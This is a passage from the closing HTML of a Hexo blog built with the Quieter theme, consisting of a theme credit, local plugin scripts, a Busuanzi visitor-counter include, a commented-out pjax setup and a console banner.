		<span><a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> theme by <a target="_blank" rel="noopener" href="https://github.com/GZ-Metal-Cell/hexo-theme-quieter">Quieter</a>.</span>
		
	</div>

	
<script src="/js/plugins/ref.js"></script>

	
<script src="/js/plugins/highlight_tools.js"></script>

	<script>
		var copyIcon = "/images/icon/copy.png";
		var closeCodeBlockIcon = "/images/icon/close_code_block.png";
		var highlightShrink = "";
		var HighlightHeightLimit = "";
	</script>
	
	<!-- Analytics -->

    
        <!-- Busuanzi Analytics -->
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    


	

	

    
		
<script src="/js/plugins/replaceSpacesWithNbsp.js"></script>

	

	
	
	
		<script>
			if (typeof init === 'function') {
				init();
			}
		</script>
	

	
		
	

	

	<!--
		
<script src="/js/plugins/jquery.pjax.min.js"></script>

		<script>
			$(document).pjax('a[target!=_blank]', 'main', {
				fragment: 'main',
				timeout: 8000
			});

			$(document).on('pjax:complete', function() {
			});
		</script> 
	-->
	<script> 
	        console.log('\n %c Hexo-Quieter Theme %c https://github.com/GZ-Metal-Cell/hexo-theme-quieter \n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;')
	    </script></footer>
	</body>

	<!-- Hexo-Quieter 主题  https://github.com/GZ-Metal-Cell/hexo-theme-quieter -->
</html>
